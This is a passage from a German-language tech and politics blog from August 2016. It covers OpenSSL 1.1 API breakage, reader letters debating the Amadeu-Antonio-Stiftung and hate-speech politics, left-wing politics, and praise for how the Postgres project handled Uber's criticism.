Das, so würde ich sagen, ist falsch. Erstens sind viele dieser Datentypen nicht intern, sondern man musste früher darauf zugreifen weil es keine accessors gab und das auch so dokumentiert war, und zweitens ist das Hautproblem nicht, daß die Typen opak sind, sondern daß man früher structs selbst allozieren musste und das jetzt nicht mehr geht, d.h. alter code nicht compiliert, auch wenn er nicht auf irgendwelche strukturen zugegriffen hat.
Der Hintergrund für viele solche Änderungen war, daß man man structs nicht mehr auf dem Stack hat - sehr löblich. Das wurde aber so gelöst, daß man jetzt alles dynamisch über eine spezielle openssl-Funktion allozieren muss, die es früher nicht gab, und code, der die structs selbst deklariert hast, schlägt fehl, weil der Typ opak ist, auch, wenn garnicht darauf zugegriffen wird.
Im Allgemeinen ist es deshalb nicht möglich, code zu schreiben, der mit der neuen und der alten API funktioniert (also, ohne #if-massengrab).
Mir ist aufgefallen, dass auch Code mit #if-Massengrab bricht mit Version 1.1. Früher konnte man mit OPENSSL_NO_SSL2 gucken, ob die verwendete Version mit SSL2-Support kommt oder nicht. OpenSSL 1.1 hat kein SSL2 mehr, aber deklariert auch dieses Präprozessorsymbol nicht.
Update: Noch ein Leserbrief zur OpenSSL-Version:
OpenSSL 1.1 Unterstützung für Python ist fertig, hängt aber noch im Codereview, weil Python Core Devs mit OpenSSL-Kenntnissen Mangelware sind. Neben mir gibt es zur Zeit nur drei weitere aktive, von denen zwei mit anderen Dingen beschäftigt sind. Zum Glück habe ich schon vor einem halben Jahr mit meinem Patch angefangen angefangen und einige Patches bei OpenSSL eingereicht. Andernfalls würden mir jetzt die Zugriffsfunktionen auf diverse struct member fehlen.
https://bugs.python.org/issue26470
Zwei weitere Punkte:
1) Es reicht nicht, nur auf OPENSSL_VERSION_NUMBER zu prüfen. LibreSSL hat OPENSSL_VERSION_NUMBER gekapert und missbraucht das Makro für die eigene Versionsnummber 2.x. Man muss also immer noch zusätzlich auf nicht-LibreSSL testen:
```
#if (OPENSSL_VERSION_NUMBER > 0x10100000L) || !defined(LIBRESSL_VERSION_NUMBER)
```
2) Nach sweet32 hat OpenSSL 1.0.2 nur noch einen sicheren Algorithmus für symmetrische Verschlüsselung. ChaCha20 gibt es erst in 1.1. Ich habe mit Richard Salz vom OpenSSL Team gesprochen. Er teilt meine Sorge, trotzdem wird OpenSSL 1.0.2 LTS keine Unterstützung für ChaCha20 erhalten.
https://twitter.com/ChristianHeimes/status/768434388052938756
Nur falls jemand dachte, hey, dann bleib ich halt bei OpenSSL 1.0.2! Übrigens sei an der Stelle der Hinweis erlaubt, dass Version vor 1.0.1 schon länger gar keine Updates mehr kriegen. Man sieht vereinzelt da draußen noch OpenSSL 0.9er-Versionen rumfliegen. Ganz, GANZ gruselig.
Das mit Chacha20 war bei mir übrigens auch der Auslöser für den Umstieg auf 1.1. OpenSSL 1.1 hat nämlich endlich Support für die Dan-Bernstein-Erfindungen Chacha20 und Poly1305. Je älter ich werde, desto weniger traue ich Krypto-Sachen, die nicht von djb kommen oder von ihm abgenickt wurden. Der Mann hat einfach zu oft Recht behalten, als alle anderen abgewunken, relativiert oder gelacht haben. Ich sehe übrigens keinen inhaltlichen Grund, wieso man Chacha20 und Poly1305 nicht auch in 1.0.2 haben sollte, das gibt es seit Jahren für 1.0x-Versionen von OpenSSL als Patch, und LibreSSL hat es auch von Anfang an drin. Finde ich absolut unverständlich, was das OpenSSL-Team sich da leistet.

Fri Aug 26 2016

[l] Das haben wir jetzt von dem Hatespeech-Scheiß: Fox News fährt die offensichtliche Gegenstrategie zu Hatespeech-Vorwürfen und labelt einfach die Democrat-nahe Watchblog-Seite Media Matters als Hate Speech. Media Matters sammelt kleine Videoclips von Momenten, bei denen Politiker aus dem rechten Spektrum mal wieder so richtig ins Klo greifen. Fox News-Moderatorin Megyn Kelly findet jetzt, hey, frag doch mal die "Opfer" von diesen Klarstellungen, die empfinden das auch nicht als freundlich!1!! Also ist das Hate Speech!
Und es gibt NICHTS, was die Linke dagegen sagen kann. Denn das Wort ist nicht definiert, und der Wortstamm basiert auf Begriffen aus der Emotionswelt, nicht Tatbeschreibungen. Klar, inzwischen wurden Definitionsversuche nachgereicht.
Hier ist zum Beispiel die Definition der Amerikanischen Anwaltskammer:
Hate speech is speech that offends, threatens, or insults groups, based on race, color, religion, national origin, sexual orientation, disability, or other traits.
Wenn jemand etwas über eine Gruppe von Menschen sagt, und die sich beleidigt fühlt, ist das Hate Speech. JA SUPER! Die Gruppe der Fefisten fühlt sich von der Wikipedia beleidigt. Ist jetzt Wikipedia Hatespeech?
Herzlichen Glückwunsch, liebe Hatespeech-Kreuzritter der Linken. Das habt ihr ja toll gemacht! Endlich hat die CDU einen schönen Vorwand, um Indymedia zuzumachen!
Beachtet bitte, dass die Rechten in den USA gerade Ober- und Unterhaus kontrollieren. Die können Gesetze machen. Wenn die jetzt ein Hatespeech-Gesetz machen und damit MSNBC als Hatespeech zumachen, dann ist das eben so. Sowas muss man sich überlegen, bevor man die geladene Schusswaffe in die Mitte des Tisches legt.

Tue Aug 23 2016

[l] So, einige Einsendungen zu meinem Aufruf gestern sind reingekommen. Hier die erste Fuhre.
Vorweg, ich habe nichts für die Stiftung zu sagen, ich habe aber eine Aluhut-Theorie für dich:
Vielleicht ist die Skandal um die AA-Stiftung ja ein Gegenfeuer dazu, dass Bertelsmann jetzt die öffentliche Meinung bei facebook zensiert. Das ist ja eigentlich ein viel größerer Klops, es scheint aber angesichts der AA-Debatte nahezu unterzugehen.
Guter Hinweis! Die Presse berichtete, dass Facebook ihre Zensur an Arvato outgesourced hat, aber nicht alle werden wissen, dass Arvato Bertelsmann gehört.
Ein anderer Einsender verwies auf diesen Blogeintrag bei Mobilegeeks, den ich allerdings nicht ernst nehmen kann, weil er direkt hiermit eröffnet:
ausgerechnet denen den Willen zur Einschränkung der Meinungsfreiheit unterstellt, die versuchen, es wieder jedem möglich zu machen angstfrei die eigene Meinung zu sagen
Sorry, das geht mir dann doch zu weit. Nicht mal die AA-Stiftung selbst behauptet von sich, für die freie Meinungsäußerung ohne Angst einzutreten. Der Autor scheint mir auf dem Weg irgendwo falsch abgebogen zu sein.
Ein dritter Einsender verweist auf dieses EU-Papier für mehr Toleranz, das, aus dem entsprechenden Blickwinkel gelesen, wie die Einführung einer Indoktrinationsmaschinerie klingt (besonders Sektion 8 und 9).
Sanfte Grüße Sir, was sind Ihre Extreme?
Noch jemand wies auf die Selbstverteidigung der AA-Stiftung hin, die auf mich ja eher peinlich wirkt, ehrlich gesagt. Aber vielleicht seht ihr das ja anders.
Der einzige aus meiner Sicht ernstzunehmende Fürsprecher hat leider einen Haufen persönlicher Informationen in seinem Beitrag, die ich mal vorsichtig rauszufiltern versuchen werde, solange ich nicht sicher weiß, dass ich das veröffentlichen darf.
Ich habe mich jahrelang gegen das braune Haus in unserem Dorf [Name zensiert] engagiert. Wir haben dazu eine Bürgerinitiative gegründet und uns persönlich den Nazis entgegen gestellt. Ja, das ist das Haus, in dem Ralf Wohlleben, Rene Kapke und Co. gelebt und gewirkt haben. Ja, ich habe die Leute persönlich kennen gelernt und mit ihnen auch öffentlich und privat gestritten. Ja, das ist der Stadtteil, in dem die drei NSU-Leute aufgewachsen sind. Ja, das ist der Stadtteil, in dem die Garage steht, in der die Rohrbomben gefunden wurden, mit deren Auffinden das Untertauchen des NSU begann. Ja, das ist das Haus, in lt. Anklage die Waffenlieferung und Unterstützungen für den NSU stattgefunden habe. Inzwischen ist das Haus abgerissen. Unsere Aufgabe ist erledigt.
Aber zurück: Unsere Initiative hat von der AA-Stiftung Unterstützung bekommen. Wir hatten finanzielle Unterstützung in Form eines Preisgeldes (nicht von der Stiftung). Als wir eine Plakataktion machen wollten, bei der Schulen zur thematischen Auseinandersetzung mit dem Thema Rechtsextremismus aufgefordert wurden, hat uns die AA-Stiftung kräftig unterstützt. Sie haben dafür gesorgt, dass wir - ohne an unser Geld zu gehen und ohne den formalen Kram bei uns abzuladen - die besten Plakate an den großen Werbetafeln der Einfallsstraßen platziert wurden.
Kurz gesagt habe ich die AA-Stiftung nur als eine zurückhaltende und unterstützende Organisation lokaler Initiativen wahrgenommen. Allerdings ist das alles schon ein paar Jahre her. Zu den "Pranger"-Aktionen kann ich nichts sagen. Das ist in dem mir bekannten Netzwerken nicht angekommen und war dort nie Thema.
Ich würde Dich also bitten, zwischen den verschiedenen Aktionen der Stiftung zu unterscheiden und nicht aus einer Katastrophe auf alle anderen Bereiche zu schließen.
Update: Zu dem Mobilegeeks-Ding findet ein Kumpel, dass ich den zu vorschnell abkanzele. Seine Interpretation sei, dass die Stiftung niemanden zensieren, sondern nur die Auswüchse bekämpfen will, die es den Leuten unmöglich machen, ihre Meinung angstfrei zu äußern. Lest das also selber.
Update: Leserbrief:
nicht sicher, ob das etwas ist wonach du suchst, weil es nicht erklärt/verteidigt, was die AA sonst so macht aber sie führen eine Chronik flüchtlingsfeindlicher Aktionen, die in meinen Augen ein sehr wichtiger Dienst ist (zumindest habe ich sonst nirgends eine so vollständige und mit Quellen versehene Liste dieser Art gefunden)
Aber vermutlich ist das nicht wonach du suchst...
Doch, das ist genau, wonach ich suche.
Update: Und noch ein toller Leserbrief:
die Amadeu-Antonio-Stiftung greift da gerade ins Klo, aber wir brauchen sie aus diesen anderen Gründen noch.
Sie ist definitiv das kleinere Übel gegenüber den Nazis!
(Bisher ja nicht so der Kracher, aber bleibt mal dran)
Es mag vom Tegernsee oder München, von Charlottenburg oder dem Prenzlauer Berg aus schwer vorstellbar sein, aber z.B. hier im östlichen MV / nordöstlichen Brandenburg wie in weiten Teilen der (Ost-) Provinz gibt es eine jahrzehntelang etablierte dumpf-braune Subkultur, mittlerweile wächst die 3. Generation in diesem Milieu heran. Bis zur Jahrtausendwende gab es hier außer ein paar Pastoren einfach niemanden, der jungen Leuten, die keine Lust auf Landsermucke und Punker-Klatschen hatten, irgendwelche Angebote gemacht hätte. Von Staats wegen herrschte die Doktrin der "akzeptierenden Jugendarbeit" vor, d.h., die Jungglatzen gingen zum Abhitlern ins kommunal geförderte Jugendzentrum.
Für Leute von 12 - 18 Jahren, die mit Kirche nichts am Hut haben und nicht mit dem rassistischen Strom schwimmen wollen, bleibt eigentlich nur die Flucht.
Das Verdienst der AAS ist es, in solchen Verhältnissen für Ermutigung, Stärkung und regionale Vernetzung solcher Menschen zu sorgen. Mit einer Vielzahl kleiner Ansätze im sozio-kulturellen Bereich bleiben sie in der Fläche aktiv bzw. ermöglichen Aktivitäten wie multikulturelle Feste, interkulturelle Events und Kurse an Berufsschulzentren, wo die Kids vielleicht das erste Mal in ihrem Leben mit einem Kameruner oder Libanesen wirklich sprechen können oder einfach gemeinsam Musik machen, kochen und ähnliches.
Die ASS unterstützt mobile Beratungsteams, die in den Käffern, wo die Glatzen mal wieder einen nicht-rechten Klub verwüstet haben oder vorm Flüchtlingsheim randalieren, den ganz normalen Leuten den Rücken stärken und sie ermuntern, dem Mob etwas entgegenzusetzen.
Nicht zuletzt die lokalen Unterstützer-Initiativen für Flüchtlinge, die in dieses feindliche Klima geworfen sind, können sich bei der AAS Know-how, technische Hilfe und alle möglichen Arten der Unterstützung holen.
Sie ist es auch, die bei den Ministerien und untergeordneten Behörden immer wieder auf der Matte steht und Aktivität und Mittel gegen den Mainstream aus Ressentiment und Ignoranz einfordert.
Ich selbst bin Handwerker und trage privat und im Arbeitsumfeld mein Schärflein zu einer offeneren, toleranteren Gesellschaft bei, so gut ich kann.
Ursprünglich in Berlin zu Hause, beobachte und kenne ich den Alltag hier draußen sei knapp 15 Jahren.
Ich bin also nicht beruflich im sozialen Sektor unterwegs und betrachte die Entwicklung eher als aktiver Bürger (im Sinne von citoyen).
Mein Eindruck ist, dass es eine Menge Leute hier nicht mehr gäbe ohne die stetige, kleinteilige lokale Arbeit, die die AAS tut.
Gerade seit 2014/15 mit dem großen Zustrom von Migranten auf das platte Land kann man sehen, wie notwendig die Präsenz einer kleinen aber aktiven Fraktion weltoffener und nicht fremdenfeindlicher Menschen ist.
Das Gefühl tut gut, mit den Dumpfbacken nicht allein gelassen zu sein, und dieses Gefühl verdanke ich zu einem guten Teil Initiativen und Aktionen aus dem ASS-Portfolio, denn gerade im politischen Raum gibt es sonst kaum jemanden, der hier so lange bei der Stange geblieben wäre.
Zu dieser ganzen Nohatespeech-Sache kann ich wenig sagen, da ich weder Twitter- noch Facebook-Nutzer bin.
Möglicherweise hat sich die Stiftung, was ihre Netz-Aktivitäten betrifft, einfach die falschen Leute eingetreten.
Abseits von Don Alphonsos Privatfeldzug gegen gewisse Berliner Ex-Piratinnen muss ich allerdings Deinem Leser beipflichten, dass die breitflächige Bertelsmann-Zensur der sog. Sozialen Medien mir doch der größere Skandal zu sein scheint im Vergleich zu den paar 1000 €, die das Familienministerium in ein schlechtes Neue-Rechte-Wiki versenkt hat.
Wenn man mal schaut, wer sich da jetzt alles in Empörung übt und mit welchen Argumenten ("Stasi! Stasi! STAAASI!!!"), kann man sich eigentlich nur wundern, welche und wie viele ASS-Experten und -watchdogs es in diesem Land gibt.
Wunderbar, vielen Dank an die Leserbriefschreiber. Sowas hatte ich mir gewünscht. Audiatur et altera pars.

Sun Aug 21 2016

[l] Das finde ich ein schönes Statement zur Burka-am-Strand-Debatte in Frankreich. Ein Imam aus Italien hat auf Facebook kommentarlos Fotos von Nonnen am Strand veröffentlicht.
Natürlich hat Facebook erstmal seinen Account zugemacht.
Warum?
Na weil Denunzianten sein Profil als Fake geflaggt haben. Und wir als Gesellschaft haben ja Zensur privatisiert. Und finden Denunzianten toll.

Mon Aug 8 2016

[l] Na DAS ist ja mal ein Rundumschlag:
Der baden-württembergische Verbraucherschutzminister fordert ein härteres Vorgehen gegen Straftaten und Hetze im Internet. Außerdem plädiert er für eine Deutschpflicht in sozialen Netzen. Auch Gewaltspiele sollten unter die Lupe genommen werden.
Ein Befreiungsschlag! Oh und seht nur die ganzen liberalen Grundwerte, die hier vertreten werden, wenn der Staat uns mehr Freiheiten geben will!1!!
Bei der Deutschpflicht in sozialen Netzen geht es übrigens um die Türken, die sich jetzt als Erdogan-Anhänger herausgestellt haben. Offensichtlich hat das Landesamt für Verfassungsschutz das vorher nicht mitbekommen, weil ihnen türkisch-Übersetzer fehlten. Daher sollen die Leute jetzt halt angehalten werden, das gleich auf Deutsch zu schreiben. Das geht ja so auch nicht, dass die Bürger die wohlmeinende Totalüberwachung des Staates durch Nutzung von Feindsprachen als Chiffre sabotieren!
Update: Ein Einsender erklärt:
Peter Hauk ist Landesminister fuer den Laendlichen Raum, Verbraucherschutz und Landwirtschaft in BaWue. "Verbraucherschutz" ist das wenigste, was er kann, ansonsten ist er Diplom-Forstwirt.
Als strammer Katholik im laendlichen Raum standesgemaess das dritte mal verheiratet 8)
Wikipedia "Im Mai 2014 distanzierte sich Hauk nach massiver innerparteilicher Kritik von seinem Vorschlag, dass die CDU auch künftig mit der AfD koalieren könnte." Bleiben keine Frage offen.
Die CDU hat die Wahl in BaWue verloren und hat fast nur noch Kandidaten aus dem "laendlichen Raum" im Landtag. Also da, wo die Bauern und alten auch einen schwarzen Stock waehlen, mit entsprechender Qualifikation.
(Danke, Jakob)

Sun Aug 7 2016

[l] Hier noch eine Einsendung zur Frage "wer wählt eigentlich die CDU?":
Zur Info: Ich bin in Deutschland geboren. Ich bin rein rechnerisch (sofern man so einen Quatsch überhaupt machen will) nicht 100% deutsch, sondern nur zu einem kleinen Teil. Obwohl ich "genetisch" hauptsächlich deutsch bin, ist meine palästinensische Herkunft immer sehr prominent in meinem Leben gewesen. Ich weiß nicht genau woher das kommt, aber von klein auf, Kindergarten, Schule, bis heute, trage ich das "teilweise Ausländer sein" mit mir rum. Das kommt wahrscheinlich daher, dass ich trotzdem nicht sehr "deutsch" aussehe und mein Vorname arabisch ist und somit mein Umfeld mich nicht direkt als "Deutschen" wahrnimmt.
Langer Rede kurzer Sinn: Von der Gesellschaft werde ich als quasi Ausländer wahrgenommen und ich habe daher jedes Interesse daran, dass ich in einem eher linken Umfeld und in einer eher linken Gesellschaft lebe, da ich in einer rechts(-extremen) Gesellschaft wahrscheinlich ziemliche Probleme bekommen würde. Darum habe ich auch, bis einschließlich der vorletzten Bundestagswahl, linke Parteien gewählt. Die letzte Wahl habe ich meine Stimme ungültig gemacht. (Ich habe analog auf Landes-Ebene gewählt.)
So, was ist nun mein Problem?
Ich schaffe es seit der letzten Bundestagswahl nicht mehr die für mich (angeblich) richtigen Parteien zu wählen, weil mich die Parteien und das ganze Gesellschaftsspektrum, das sich hinter diesen Parteien versammelt, einfach nur noch anekeln und ich mich darin nicht mehr wiederfinden kann.
Ich habe wirklich Jahre gebraucht um zu verstehen, woher das kommt, aber ich glaube du hast mich auf den Trichter gebracht, was das Problem ist: Es gibt (zumindest keine wahrnehmbare) moderate/realistische linke Politik mehr in diesem Land. Sobald ich nach Links blicke, sehe ich nur noch Ultrafundamentalpositionen von dem Kaliber: "Reißt alle Grenzen ein, Männer sind die Personifikation des Satans, wenn ich von einem weißen Mann vergewaltigt werde gehört er kastriert und in den Gulag, wenn ich von einem Asylanten vergewaltigt werde, ist es meine eigene Schuld, dass ich nicht tolerant genug war und ihn ausreichen integriert habe (no pun intended…)."
Es tut mir leid, aber ich kann dagegen gar nicht mehr anreden gegenüber anderen Menschen, weil ich auf diese Idiotie angesprochen, der Gegenseite nur noch Recht gegeben kann. Es IST peinlich und idiotisch und vollkommen haarsträubend, was auf der linken Seite der Gesellschaft passiert.
Oder ist das einfach nur das, was man heutzutage als "Links" bezeichnet? Vielleicht fängt "Links" ja viel weiter "Rechts" an, als wir es uns eingestehen wollen. Vielleicht befinden sich nur noch die Fundis und die Extremisten auf der "linken" Seite der Gesellschaft, weil wir alles andere direkt als braune Nazi-Soße abkanzeln?
Worauf ich hinaus will ist, dass ich (zu meinem eigenen Entsetzen) mich immer mehr zu den sogenannten "Rechten" hingezogen fühle, obwohl die ja meine natürlichen Fressfeinde seien müssten. Die Sache ist schlicht, dass ich mitten unter diesen Menschen lebe (seit zwei Jahren in Bayern) und so sehr ich denen in vielen Dingen widerspreche… Ich habe (fast) nie das Gefühl einem vollkommen verrückten Menschen gegenüber zu stehen.
Unsere Meinungen mögen sich in vielen Dingen stark unterscheiden und ich bin gegen vieles ausdrücklich dagegen, aber zumindest bin ich in der Lage mit diesen Menschen eine gesittete Diskussion zu führen, ohne direkt als Masku-Nazi(die Ironie…)-Ultra-Scheiß-Arschloch hingestellt zu werden. Ich kann sogar viele der Argumente nachvollziehen, ohne dass ich sie teilen muss und im Gegenzug wird mir zugesprochen, dass meine Motivationen nachvollziehbar sind und man jedoch schlicht aus persönlichen Gründen lieber einen etwas anderen Kurs verfolgen möchte. Witzigerweise fühle ich mich von KEINER der mir gegenüber geäußerten Positionen wesentlich bedroht. Das ist bei meinen Diskussionen mit linken Fürsprechern deutlich anders. Da fühle ich mich regelmäßig dazu genötigt ein formales Entschuldigungsschreiben zu formulieren, dass ich einen Penis habe und als 1/4 Palästinenser irgendwie doch auch mit daran Schuld bin, dass Juden in Israel sterben.
Und so stehe ich jetzt seit Monaten in einem ständigen Konflikt mit mir selbst und frage mich, ob es für mich selbst nicht doch in der nächsten Bundestagswahl schlauer sei die CDU/CSU oder sogar die AFD zu wählen, als irgendeine linke Partei. Einfach weil ich weiß, dass so oder so bereits mehr als genug linke Galle versprüht wird, sodass am Ende so etwas wie ein "Gleichgewicht" entsteht, bzw. eine "Politik der Mitte" gefahren wird.
Ich weiß, dass klingt verrückt, aber ich bin wirklich an dem Punkt wo ich als Mann und sogar als "Mensch mit irgendwie Migrationshintergrund" Angst davor habe, dass eine mehrheitlich linke Regierung gewählt wird. Ich habe blanke Panik davor, weil ich damit rechnen muss, dass das vollständig in Zensur, Unterdrückung und Tyrannei von bestimmten Gesellschaftsgruppen münden würde. Nicht, dass die Rechten da frei von Sünde seien, aber diese Angst wie bei den Linken, habe ich bei denen zurzeit nicht.
Ich finde den Punkt besonders wichtig, dass er bei den Rechten das Gefühl hatte, die seien Argumenten zugänglich. Ich glaube, dass der Mechanismus an der Stelle nicht nur ist "ich gehe da drüben hin, da ist es kuscheliger", sondern auch "ok, ich kann bei den Linken arbeiten, aber das sind Fundamentalisten, da habe ich 3% Chance, dass die sich in einer Streitfrage meiner Position anschließen, weil ich gute Argumente habe. Oder ich kann zu den Rechten gehen, und bei denen ist zwar die Ausgangslage viel schlimmer, aber dafür ist auch die angenommene Wahrscheinlichkeit, dass ich die in meine Richtung beeinflussen kann, viel höher". Mir persönlich ist immer das Gefühl sehr wichtig, auch was bewirken zu können. Wieso sollte ich überhaupt was mit irgendeiner Partei machen, wenn nicht um was zu bewegen? Und wenn die eh nur das machen, was sie halt machen, und nicht auch mal auf meine Argumente hören, wieso sollte ich mich denen anschließen und die nicht einfach alleine weitermachen lassen?
Dieses Gefühl, dass die einem zuhören und die eigenen Standpunkte respektieren, das ist sehr wichtig, und ich persönlich habe das bei den Linken nicht. Bei den Rechten aber auch nicht. Ich weiß nicht, mit wem der Einsender da geredet hat, aber ich befürchte fast, er hat da einen statistisch sehr unwahrscheinlichen Glücksgriff getätigt :-)
[l] Ihr erinnert euch hoffentlich noch alle gut an Warum schweigen die Lämmer?, den Vortrag von Prof Dr Rainer Mausfeld. Dieser Vortrag hat damals viele Menschen sehr beeindruckt, und wenn ihr ihn noch nicht gesehen habt, dann guckt ihn jetzt.
Rainer Mausfeld hat seit dem noch andere Sachen gemacht, u.a. dieses Interview bei Phoenix (Teil 2), und vor ein paar Tagen hat KenFM eine lange Sendung mit ihm veröffentlicht. Nicht als Video sondern "nur" als Text und vorgelesenes Audio verfügbar ist dieses ältere Nachdenkseiten-Interview mit ihm, und dieses aktuelle.
Es gibt dort unter anderem eine Stelle, in der es um Neoliberalismus geht. Mausfeld erklärt, dass Neoliberalismus die folgenden Eigenschaften hat: Er hat mit Liberalismus nichts zu tun, pervertiert sogar explizit seine Normbegriffe, ist wenig konkret greifbar, und versteckt sich, leugnet die eigene Existenz.
Diese Stelle beunruhigt mich gerade, denn ich sehe Parallelen. Die Neocon-Bewegung ist ja auch eine Pervertierung der Konzepte des Konservatismus (wie der Name schon sagt geht es da um die Erhaltung von Dingen, die Neocons stehen aber vor allem für den Abbau, nicht das Erhalten von Dingen). Wir haben also eine Bewegung, die unter Vorspiegelung falscher Fahnen den Konservatismus getötet hat, und eine, die unter Vorspiegelung falscher Fahnen den Liberalismus getötet hat.
So und jetzt gucken wir uns mal die Linken an. Ist da nicht exakt das selbe passiert? Wir haben eine Bewegung, die sich als die links tarnt, und unter dieser falschen Fahne dann das Gegenteil propagiert. Linke Werte spielen keine Rolle mehr, es geht um eine andere Agenda. An Stelle von Kapitalismuskritik, der Idee des zusammen die Welt besser machens, der Gemeinsamkeit sogar als Mittel und Methode der Verbesserung (Solidar-Konzepte für den Schutz der Schwachen) ist ein Gegeneinander geworden, ein Grabenkrieg, ein sich gegenseitig das Links-sein absprechen. Ich glaube, wir haben hier das gleiche Phänomen, vielleicht sogar das selbe Phänomen in der Linken, das vorher die anderen politischen Bewegungen getötet hat. Es gibt im politischen Haus jeweils noch ein paar Hausmeister und Reinigungspersonal, die die Lichter anlassen und rituelle Bewegungen durchführen, um den Anschein zu erwecken, als ginge es hier noch um die gleiche Sache wie früher. Aber tatsächlich ist das nicht mehr so.
Ich schlage vor, ab jetzt analog zu Neocon und Neoliberal von Neolinks zu sprechen.
Wenn ihr keine Zeit habt, guckt euch mindestens das aktuelle Nachdenkseite-Interview mit Mausfeld an. Da geht es um die "Links-Rechts-Demagogie".
Update: Nein, wirklich, lest euch das neue Interview mit Mausfeld durch. Wenn ihr Zeit für einen Link pro Monat habt, nehmt diesen.

Sat Aug 6 2016

[l] Noch ein Nachschlag zur Amadeu-Antonio-Stiftung.
Ich sehe mich ja zur Fundamentalopposition gegen die genötigt, weil die diese Hatespeech-Internetzensur-Denunziantenschiene fahren.
Aber ich stelle mir natürlich auch die Frage, ob ich denen jetzt Unrecht tue. Vielleicht tun die ja ansonsten lauter ganz tolle Sachen. Ein Kumpel hatte mir dazu gesagt, dass die für das Projekt Noteingang stehen.
Ich habe da jetzt noch ein paar Zuschriften gekriegt und noch ein paar Gespräche geführt. Hier ist das Ergebnis.
Erstens: Hinter dem Projekt Noteingang steckt nicht die Amadeu-Antonio-Stiftung, sondern das ist ursprünglich ein Antifa-Projekt. Wie die genaue Historie ist, hängt wahrscheinlich von der Gegend ab, die Antifa ist ja eine eher dezentrale Angelegenheit. Die Amadeu-Antonio-Stiftung behauptet bei näherer Betrachtung auch gar nicht, Noteingang erfunden zu haben, nur dass sie bei einer Umsetzung mitgemacht haben.
Eine Zuschrift las sich, als ob sie die Lage aus Behörden oder Ministeriumssicht beschreibt. Die Botschaft war, ich kürze das mal grob ab, dass die so weit und breit das einzige halbwegs verlässliche linke Projekt sind, das man da fördern kann, und die sich auch als Organisator oder Abrechnungspartner für andere Projekte verstehen. Das Ministerium gibt der AA-Stiftung Geld, die bezahlt damit dann linke Verpeiler, die das eigentliche Projekt machen. So ungefähr habe ich das jedenfalls verstanden. Es klang ein bisschen verzweifelt, so: Wenn man die jetzt wegnimmt, dann bleibt in weiten Teilen Ostdeutschlands überhaupt niemand mehr übrig, der Kulturprojekte für Jugendliche macht.
Dann stellte sich für mich noch die Frage, ob die Kritik an denen vielleicht rechte Propaganda ist. Dem scheint nicht so zu sein, jedenfalls nicht vollumfänglich, denn in diesem Interview in den Nachdenkseiten gibt es auch linke Fundamentalopposition gegen den Vorstand und insbesondere Frau Kahane. Der Vorwurf ist:
Indem die Stiftungsvorsitzende Kahane sich derselben Methoden bedient wie ihre angeblichen Gegner, leitet sie Wasser auf deren Mühlen.
Das ist ja auch der Eindruck, den ich jetzt angesichts dieser Netzzensur-Hatespeech-Geschichte gewonnen hatte. Aber lest euch das mal ganz durch, das geht noch deutlich weiter.
Und dann gibt es noch die Fundamentalkritik an der AA-Stiftung, dass sie zu nah an staatlichen Institutionen arbeitet, u.a. sitzt im Stiftungsrat der Leiter des Landesamtes für Verfassungsschutz von Thüringen. Aus meiner Sicht ist das eine unerträgliche Verquickung, Mitarbeit in einem Geheimdienst und Mitarbeit in einer Stiftung für Demokratie und Zivilgesellschaft geht nicht gleichzeitig. Auf der anderen Seite gibt es das Argument, dass der Verfassungsschutz in Thüringen nach dem NSU-Skandal entkernt wurde. Die regierende Rot-Rot-Grüne Landesregierung hätte dort beispielhaft eine Verfassungsschutzbehörde geschaffen, die den Namen auch verdient hat. Ich habe zu wenig Einblick, um das Argument bewerten zu können, daher nenne ich es hier ohne Wertung.
Ein Kritikpunkt, den ich auch ein paar Mal gehört habe, ist dass die Stiftung sich von staatlichen Fördermitteln so abhängig gemacht hat, dass sie nicht mehr als unabhängige Stiftung gesehen werden kann. Das kann ich mangels Einblick in die Zahlen auch nicht beurteilen, aber es erscheint mir zumindest plausibel.
Insgesamt komme ich für mich zu dem Schluss, dass meine Fundamentalkritik an dieser Stiftung bezüglich der Internet-Geschichte auch im Hinblick auf den Recht der Stiftung und ihrer Arbeit gerechtfertigt ist. Mehrere Gesprächspartner weisen aber darauf hin, und das will ich hier gerne weitergeben, dass die Kritik nicht die Tausende von Freiwilligen meint, sondern den aktuelle Führungsriege betrifft, insbesondere Frau Kahane.
Ich sage euch das hier als Information über meine Gedankengänge. Bildet euch eure Meinung bitte selbst.
Wer den Link oben gut fand, und mehr von Rudolph Bauer und seine Analysen über die Linken lesen will, dem empfehle ich auch dieses Interview hier. Viel Spaß bei der Lektüre.

Thu Aug 4 2016

[l] Ich bin diese Tage übrigens echt positiv beeindruckt von Postgres. Ich hab die immer als so Seniorendatenbank wahrgenommen. Kann SQL, auch durchaus zuverlässig und so weiter, aber basiert halt auf alter Legacy-Codebasis und "da könnte man ja auch gleich DB2 ausrollen". Aber die haben in den letzten Jahren massiv Performance gutgemacht.
Die Performance ist aber nicht, was mich beeindruckt. Beeindruckt hat mich, wie die mit Uber umgegangen sind. Uber, diese Taxi-Disruption-Startup-Klitsche, hat neulich ein Blogposting gemacht, dass sie von Postgres zu Mysql umgestiegen sind, weil sie da in ihrer Workload in ein Problem gelaufen sind, das Postgres-spezifisch zu sein scheint. Das Blogposting war nicht hämisch oder besonders abwertend oder so, aber ihr könnt euch ja denken, wie so ein Blogposting bei Softwareentwicklern ankommen kann. Formulierungen wie "We encountered many Postgres limitations" und dann ganz häufig "Inefficient", da kann man sich schon persönlich niedergemacht fühlen.
Bei sowas gibt es im Allgemeinen mehrere Reaktionen. Erstens verletzt das die Gefühle, zweitens zweifelt man deren Messmethoden oder Ergebnisse an, drittens greift man die Personen an, und viertens schimpft man über den ganzen Laden, der das gebloggt hat. So oder so ähnlich läuft das jedenfalls sonst häufig.
Aber nicht bei Postgres.
Da hat niemand rumgewinselt, niemand hat Uber angegriffen, niemand hat deren Messmethoden angezweifelt. Die haben das Szenario nachgestellt, haben gesehen, dass man da was besser machen kann, und setzen sich jetzt hin und überlegen, was sie verbessern können.
So traurig das ist: Das erlebt man sehr, sehr selten. Projekte, die so reagieren, muss man sich warmhalten. Hut ab für Postgres.
Ich würde gerne wissen, was die besser als die anderen gemacht haben, um sich ihre Professionalität nach außen zu erhalten.
Vielleicht ist es ja gar nicht schlecht, eine Seniorendatenbank zu fahren. Da weiß man dann wenigstens, dass man es mit Erwachsenen zu tun hat :-)
[l] Wenn man vor Gericht steht, steht einem ein Pflichtverteidiger zu. In den USA gibt es dafür eine eigene Behörde, die ein eigenes Budget hat. Wenn deren Budget alle ist, dann können die halt nicht mehr verteidigen. Und wie sich rausstellt, ist denen in manchen Bundesstaaten über die Jahre systematisch das Budget weggekürzt worden.
Hier ist die großartige Lösung, die sich der zuständige Behördenleiter in Missouri ausgedacht hat.
